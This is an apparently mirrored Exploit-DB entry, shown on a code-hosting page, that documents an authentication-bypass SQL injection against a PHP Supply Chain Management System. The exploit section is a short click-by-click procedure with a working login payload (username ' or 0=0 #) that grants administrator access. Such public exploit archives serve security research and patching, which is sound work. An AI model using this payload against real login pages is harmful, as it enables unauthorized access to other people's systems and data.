bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49239.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

21 lines
No EOL
740 B
Text
Raw Blame History

# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4
#Vulnerable Page: Login Page
#Exploit
Open the Application
check the URL: http://localhost/scm-master/
Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin
click on login
The SQL payload gets executed and authentication is bypassed successfully
Reference in a new issue View git blame Copy permalink